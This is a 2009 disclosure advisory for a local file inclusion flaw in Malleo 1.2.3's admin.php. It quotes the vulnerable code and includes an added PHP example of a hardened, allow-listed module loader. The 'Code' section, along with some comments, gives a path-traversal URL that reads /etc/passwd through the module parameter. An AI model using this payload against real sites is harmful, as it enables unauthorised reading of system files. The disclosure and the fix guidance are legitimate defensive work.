
Malleo 1.2.3 Local File Inclusion Vulnerability







*******   Salvatore "drosophila" Fresta   *******

[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com

[+] Bugs: [A] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Local File Inclusion

[-] Risk: low
[-] File affected: admin.php

This bug allows a privileged user to include arbitrary local
files through the module parameter of admin.php. I decided to
publish this bug for the purpose of reporting the security
flaw only. The following is the vulnerable code:

...

$module =  (isset($_GET['module']))?
$_GET['module']:$cf->config['default_module_admin'];

...

}else{
	// Update the activity timestamp of the founder session
	if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
	if (file_exists($root.$module))
	{
		include_once($root.$module);

...
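The same dispatch pattern, written out as an added example that is not part of this advisory or of Malleo's source: the unsafe version quoted above beside a hardened one. The $root value, the allow-list of module files, the HTTP 400 response and the assumed admin-session branch are illustrations, not Malleo's own names.

```php
<?php
// Added example, not Malleo's code. The unsafe dispatch pattern from the
// advisory next to a hardened version. $root, the module names and the
// HTTP 400 response are assumptions for illustration.

$root = __DIR__ . '/modules/';

// Unsafe: the module name comes straight from the query string and is only
// checked with file_exists(). "/etc/passwd" exists, so
// "../../../../../etc/passwd" passes the check and is included.
function load_module_unsafe($root, $module, $default)
{
    $module = $module ?? $default;
    if (file_exists($root . $module)) {
        include_once $root . $module;
    }
}

// Hardened: map the request value onto a fixed allow-list of module files,
// then confirm the resolved path is still inside $root before including it.
// Returns the resolved path, or null if the request must be rejected.
function resolve_module($root, $module, $default)
{
    // Assumed allow-list: request value => file under $root.
    $allowed = [
        'dashboard' => 'dashboard.php',
        'users'     => 'users.php',
        'settings'  => 'settings.php',
    ];

    $module = $module ?? $default;

    // $_GET['module'] may be an array (module[]=x), so check the type too.
    // Anything containing "/", "\", ".." or an unknown name stops here.
    if (!is_string($module) || !array_key_exists($module, $allowed)) {
        return null;
    }

    // Defence in depth: even a listed file must resolve (after symlinks and
    // ".." components) to a location under $root.
    $base = realpath($root);
    $path = realpath($root . $allowed[$module]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function load_module_safe($root, $module, $default)
{
    $path = resolve_module($root, $module, $default);
    if ($path === null) {
        http_response_code(400);
        return false;
    }
    include_once $path;
    return true;
}

// Usage in admin.php, inside the branch that only runs for an authenticated
// admin session (the "}else{" branch quoted above):
//   load_module_safe($root, $_GET['module'] ?? null,
//                    $cf->config['default_module_admin']);
//
// resolve_module($root, '../../../../../etc/passwd', 'dashboard') returns
// null, because the value is not a key of the allow-list.
```

The allow-list is the actual control: the request value never becomes part of a filesystem path, it only selects one entry. The realpath() containment check is a backstop against a listed file that is later replaced by a symlink or moved out of $root. Note that file_exists() on its own is no protection at all, since the files an attacker wants to read are precisely the ones that exist.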


*************************************************

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/admin.php?module=../../../../../etc/passwd


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

